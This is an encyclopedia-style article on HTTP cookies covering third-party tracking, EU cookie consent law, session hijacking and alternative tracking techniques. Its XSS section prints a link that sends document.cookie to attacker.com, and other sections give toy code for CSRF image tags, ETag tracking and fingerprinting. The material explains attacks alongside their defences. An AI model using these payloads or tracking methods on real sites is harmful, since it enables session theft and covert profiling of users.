Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called ''third-party cookies''. A third-party cookie belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is used by advertisers to serve relevant advertisements to each user.
As an example, suppose a user visits
www.example.org
. This website contains an advertisement from
ad.foxytracking.com
, which, when downloaded, sets a cookie belonging to the advertisement's domain (
ad.foxytracking.com
). Then, the user visits another website,
www.foo.com
, which also contains an advertisement from
ad.foxytracking.com
and sets a cookie belonging to that domain (
ad.foxytracking.com
). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the
HTTP referer
header field.
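The mechanism can be illustrated with a toy simulation in which the advertiser's server assigns an identifier cookie on first contact and then logs the referring page of every later ad request. The class, method, and identifier format are hypothetical; real ad servers are considerably more involved.

```python
import itertools
from collections import defaultdict
from typing import Optional


class AdServer:
    """Toy model of a third-party server that links visits via one cookie."""

    def __init__(self) -> None:
        self._ids = itertools.count(1)
        self.history = defaultdict(list)  # cookie id -> pages that embedded the ad

    def serve_ad(self, cookie_id: Optional[str], referer: str) -> str:
        """Handle one ad request; return the cookie id the browser should keep."""
        if cookie_id is None:
            # First contact: no cookie yet, so assign a fresh identifier.
            cookie_id = f"visitor-{next(self._ids)}"
        self.history[cookie_id].append(referer)
        return cookie_id


# One browser visits two unrelated sites that embed ads from the same server.
ad_server = AdServer()
browser_cookie = None
for page in ["http://www.example.org/", "http://www.foo.com/"]:
    browser_cookie = ad_server.serve_ad(browser_cookie, page)
```

After the loop, the ad server holds a single history entry containing both pages, even though the two websites have nothing to do with each other.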
Some websites were setting cookies readable by over 100 third-party domains.
On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.
The older standards for cookies, RFC 2109
and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers contain
privacy settings that can block third-party cookies, and some now block all third-party cookies by default; as of July 2020, such browsers include Apple Safari, Firefox, and Brave. Safari allows embedded sites to use the Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies. Chrome announced plans to start blocking third-party cookies by default in late 2024.
Privacy
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a
privacy policy
) tends to eliminate any negative effects of such cookie discovery.
[Miyazaki, Anthony D. (2008), "Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage," Journal of Public Policy & Marketing, 23 (Spring), 19–33]
The United States government set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, the CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.
EU cookie directive
In 2002, the European Union launched the
Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment.
In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise, or be given notice of, cookies that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.
The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the
General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users' devices. In a case decided under the Data Protection Directive, however, the Court of Justice of the European Union later confirmed that the previous law implied the same strong quality of consent as the current instrument.
In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.
It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995
and the GDPR (Recital 32).
The GDPR is specific that consent must be as 'easy to withdraw as to give',
meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.
It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.
The
Court of Justice of the European Union
has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davies of Privacy International argues that proper enforcement would "destroy the entire industry".
However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.
Academic studies and regulators both describe widespread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.
A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third-party cookies with no notice at all. The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.'
Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.
A
W3C
specification called
P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on the specification.
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both. In 2020, the
European Data Protection Board
, composed of all EU data protection regulators, stated that cookie walls were illegal.
In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).
Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.
However, this is often ineffective against many forms of tracking, such as first-party tracking, which is growing in popularity as a way to avoid the impact of browsers blocking third-party cookies.
Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.
Cookie theft and session hijacking
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
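The following toy server illustrates why a stolen cookie is sufficient for impersonation: the session lookup depends only on the cookie value, so the server has no way of telling who presented it. The function names and the sessionToken cookie name are hypothetical.

```python
import secrets

# Server-side session table: cookie value -> logged-in user.
sessions = {}


def log_in(username: str) -> str:
    """Create a session and return the token to be stored in the user's cookie."""
    token = secrets.token_hex(16)
    sessions[token] = username
    return token


def handle_request(cookies: dict) -> str:
    """Identify the requester purely from the session cookie."""
    user = sessions.get(cookies.get("sessionToken"))
    return f"acting as {user}" if user else "not logged in"


# The victim logs in; an attacker who obtains the same cookie value
# is indistinguishable from the victim on the server side.
victim_cookies = {"sessionToken": log_in("alice")}
attacker_cookies = dict(victim_cookies)  # stolen copy
```

Both handle_request(victim_cookies) and handle_request(attacker_cookies) yield the same result, which is the situation the scenarios below try to bring about.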
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Network eavesdropping
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over
unencrypted
open
Wi-Fi
). This traffic includes cookies sent on ordinary unencrypted
HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a
man-in-the-middle attack
.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing
Transport Layer Security
(
HTTPS
protocol) to encrypt the connection. A server can specify the
Secure
flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.
Publishing false sub-domain: DNS cache poisoning
If an attacker is able to cause a
DNS server
to cache a fabricated DNS entry (called
DNS cache poisoning
), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of
f12345.www.example.com
that points to the
IP address
of the attacker's server. The attacker can then post an image URL from their own server (for example,
http://f12345.www.example.com/img_4_cookie.jpg
). Victims reading the attacker's message would download this image from
f12345.www.example.com
. Since
f12345.www.example.com
is a sub-domain of
www.example.com
, victims' browsers would submit all
example.com
-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. [Wired, "Hack Obtains 9 Bogus Certificates for Prominent Websites"] Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cross-site scripting: cookie theft
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered
HTML
and
JavaScript
content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message on
www.example.com
with the following link:
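<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>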
When another user clicks on this link, the browser executes the piece of code within the
onclick
attribute, thus replacing the string
document.cookie
with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the
attacker.com
server. If the attacker's malicious posting is on an HTTPS website
https://www.example.com
, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
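One common way for developers to neutralise such postings is to escape user-supplied text before embedding it in a page, so that markup is displayed as text instead of being interpreted. The sketch below uses Python's standard html.escape; the render_comment function and the sample posting are hypothetical, and real applications typically rely on a templating system that escapes output by default.

```python
import html


def render_comment(user_text: str) -> str:
    """Embed untrusted text in a page with HTML metacharacters escaped."""
    # quote=True also escapes single and double quotes, which matters
    # when the text could end up inside an attribute value.
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


# A posting that tries to smuggle in a link with a script handler.
malicious = '<a href="#" onclick="steal(document.cookie)">Click here!</a>'
safe_markup = render_comment(malicious)
```

After escaping, the browser shows the posting as literal characters and no onclick handler exists to run. Escaping and HttpOnly are complementary: the first aims to stop the script from running at all, the second limits what a script can read if one runs anyway.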
Cross-site scripting: proxy request
In older versions of many browsers, there were security holes in the implementation of the
XMLHttpRequest
API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the
same-origin policy. For example, a victim is reading an attacker's posting on
www.example.com
, and the attacker's script is executed in the victim's browser. The script generates a request to
www.example.com
with the proxy server
attacker.com
. Since the request is for
www.example.com
, all
example.com
cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted over
HTTPS
connections, and the HTTPS protocol dictates
end-to-end encryption
(i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
Cross-site request forgery
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file).
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
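The kind of element Mallory posts can be sketched as follows. The endpoint http://bank.example/withdraw, its parameter names, and the helper forged_image_tag are all hypothetical and serve only to show that the image source is a state-changing URL rather than an image file.

```python
from html import escape
from urllib.parse import urlencode


def forged_image_tag(action_url: str, params: dict) -> str:
    """Build an <img> element whose src points at an action, not an image."""
    src = action_url + "?" + urlencode(params)
    # Escape the URL for use inside an HTML attribute ("&" becomes "&amp;").
    return '<img src="' + escape(src, quote=True) + '">'


# Hypothetical endpoint and parameters, for illustration only.
tag = forged_image_tag(
    "http://bank.example/withdraw",
    {"account": "bob", "amount": "1000", "for": "mallory"},
)

if __name__ == "__main__":
    print(tag)
```

When a browser renders such an element, it issues an ordinary GET request to the URL and attaches any cookies it holds for that site, which is what makes the forged request look authenticated.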
Cookiejacking
Cookiejacking is an attack against Internet Explorer that allows the attacker to steal a user's session cookies by tricking the user into dragging an object across the screen. Microsoft deemed the flaw low-risk because of "the level of required user interaction" and the necessity of having a user already logged into the website whose cookie is stolen. Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.
Drawbacks of cookies
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.
Inaccurate identification
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Alternatives to cookies
Some of the operations that can be done using cookies can also be done using other mechanisms.
Authentication and session management
JSON Web Tokens
A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows JWTs to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
HTTP authentication
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
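For basic access authentication, the value the browser resends with every request is simply the Base64 encoding of "username:password". The sketch below shows that encoding and its reversal; the function names are illustrative, and the credentials are the well-known sample pair used in the Basic authentication specification.

```python
import base64
from typing import Optional, Tuple


def basic_auth_header(username: str, password: str) -> str:
    """Return the Authorization header value for HTTP basic authentication."""
    credentials = (username + ":" + password).encode("utf-8")
    return "Basic " + base64.b64encode(credentials).decode("ascii")


def parse_basic_auth(header_value: str) -> Optional[Tuple[str, str]]:
    """Recover (username, password) from the header value, or None if malformed."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic" or not encoded:
        return None
    try:
        decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
    except ValueError:
        return None
    username, separator, password = decoded.partition(":")
    return (username, password) if separator else None


if __name__ == "__main__":
    print(basic_auth_header("Aladdin", "open sesame"))
```

Since the encoding is reversible and identical on every request, the header value is effectively a stable identifier, which is why it can be used for tracking.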
URL (query string)
The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
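The link rewriting described above can be sketched with Python's urllib.parse. The parameter name sid and both helper names are assumptions made for this example; real frameworks choose their own parameter names.

```python
from typing import Optional
from urllib.parse import parse_qs, parse_qsl, urlencode, urlsplit, urlunsplit


def add_session_id(url: str, session_id: str, param: str = "sid") -> str:
    """Append (or replace) the session identifier in a link's query string."""
    parts = urlsplit(url)
    query = [
        (key, value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
        if key != param
    ]
    query.append((param, session_id))
    return urlunsplit(parts._replace(query=urlencode(query)))


def read_session_id(url: str, param: str = "sid") -> Optional[str]:
    """Server side: extract the session identifier from the requested URL."""
    values = parse_qs(urlsplit(url).query).get(param)
    return values[0] if values else None


if __name__ == "__main__":
    link = add_session_id("/cart?item=42", "abc123")
    print(link)
    print(read_session_id(link))
```

The server would apply add_session_id to every link it emits and call read_session_id on each incoming request to recover the session.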
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
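A minimal sketch of the hidden-field technique follows: the server embeds the session identifier in a form, and later reads it back from the URL-encoded POST body. The field name sid, the action path /checkout, and the helper names are hypothetical.

```python
from html import escape
from typing import Optional
from urllib.parse import parse_qs


def render_form(session_id: str) -> str:
    """Return an HTML form that carries the session identifier in a hidden field."""
    return (
        '<form method="post" action="/checkout">\n'
        '  <input type="hidden" name="sid" value="'
        + escape(session_id, quote=True)
        + '">\n'
        '  <input type="submit" value="Continue">\n'
        "</form>"
    )


def session_id_from_post_body(body: str) -> Optional[str]:
    """Extract the identifier from an application/x-www-form-urlencoded body."""
    values = parse_qs(body).get("sid")
    return values[0] if values else None


if __name__ == "__main__":
    print(render_form("abc123"))
    print(session_id_from_post_body("sid=abc123&qty=2"))
```

With method="post" the identifier never appears in the address bar, which matches the two advantages noted above.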
window.name DOM property
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window or tab will initially have an empty window.name property when opened.
In some respects, this can be more secure than cookies because its contents are not automatically sent to the server on every request, as cookies are, so it is not vulnerable to network cookie sniffing attacks.
Tracking
IP address
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.
ETag
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
ETags can be flushed in some browsers by clearing the browser cache.
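The echo behavior described above can be sketched as a small request handler. This is a simplified model, not a full HTTP server: the function name respond is hypothetical, and the request is reduced to the value of its If-None-Match header, which is where a browser returns a cached ETag.

```python
import secrets
from typing import Dict, Optional, Tuple


def respond(if_none_match: Optional[str]) -> Tuple[int, Dict[str, str]]:
    """Return (status, headers) for a resource used as an ETag-based tracker."""
    if if_none_match:
        # Returning visitor: repeat the received ETag so the browser keeps it.
        return 304, {"ETag": if_none_match}
    # First visit: mint a fresh identifier and deliver it as the ETag.
    visitor_tag = '"' + secrets.token_hex(8) + '"'
    return 200, {"ETag": visitor_tag}


if __name__ == "__main__":
    status, headers = respond(None)
    print(status, headers)
    print(respond(headers["ETag"]))
```

Each 304 response tells the browser its cached copy is still valid, so the same identifier keeps coming back until the cache is cleared.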
Browser cache
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
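A sketch of how a server might generate such a file is shown below. The function name and the one-year Cache-Control lifetime are assumptions for illustration; the text above only requires that the browser consider its cached copy up to date.

```python
from typing import Dict, Tuple


def tracking_script_response(
    user_id: int, max_age_seconds: int = 31536000
) -> Tuple[Dict[str, str], str]:
    """Return (headers, body) for a per-visitor script meant to stay cached."""
    body = "var userId = " + str(user_id) + ";"
    headers = {
        "Content-Type": "text/javascript",
        # Assumed policy: ask the browser to reuse its copy for a long time.
        "Cache-Control": "max-age=" + str(max_age_seconds),
    }
    return headers, body


if __name__ == "__main__":
    print(tracking_script_response(3243242))
```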
Browser fingerprint
A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible.
Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting. Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
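The two ideas in this paragraph, collapsing attributes into one string and reading entropy as a population size, can be sketched as follows. The attribute names and the use of SHA-256 are assumptions for illustration; real fingerprinting scripts collect different and far more numerous parameters.

```python
import hashlib
import json


def fingerprint(attributes: dict) -> str:
    """Collapse configuration attributes into a single identifying string."""
    # Sort keys so the same configuration always yields the same string.
    canonical = json.dumps(attributes, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def anonymity_set_size(bits: float) -> float:
    """n bits of entropy distinguish one configuration among about 2**n."""
    return 2.0 ** bits


if __name__ == "__main__":
    # Hypothetical attribute values.
    sample = {"browser_version": "115.0", "screen": "1920x1080", "os": "Linux"}
    print(fingerprint(sample))
    print(round(anonymity_set_size(18.1)))
```

Read this way, 18.1 bits corresponds to singling out one browser among roughly 280,000, and each additional bit doubles that figure.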
Web storage
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies, while session storage behaves similarly to session cookies, except that session storage is tied to the lifetime of an individual tab or window (also known as a page session), not to a whole browser session as session cookies are.
Internet Explorer supports persistent information in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has local shared objects and Microsoft Silverlight has isolated storage.
See also
* Session (computer science)
* Secure cookie
* HTTP Strict Transport Security § Privacy issues